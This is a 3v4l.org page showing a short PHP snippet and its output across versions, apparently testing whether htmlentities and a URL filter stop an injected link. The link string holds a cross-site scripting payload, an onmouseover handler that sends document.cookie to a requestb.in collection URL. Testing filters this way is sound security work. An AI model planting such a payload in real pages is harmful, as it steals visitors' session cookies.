3v4l.org

run code in 200+ php & hhvm versions
Bugs & Features
<?php function safeHTML($var) { return htmlentities($var); } $link = 'http://moncul.com/toto.jpg\x22onmouseover=javascript:window.location=\x22http://requestb.in/sr3wb0sr?flag=\x22+(document.cookie);'; if (!is_null($link)) { if (!filter_var($link, FILTER_VALIDATE_URL)) printf("ERROR !"); } if (is_null($link)) { $link = 'http://'; printf("NULL !"); } printf('<a href="%s">'."link".'</a>', safeHTML($link)); ?>
based on os7od
Output for 5.3.18 - 7.2.0
<a href="http://moncul.com/toto.jpg\x22onmouseover=javascript:window.location=\x22http://requestb.in/sr3wb0sr?flag=\x22+(document.cookie);">link</a>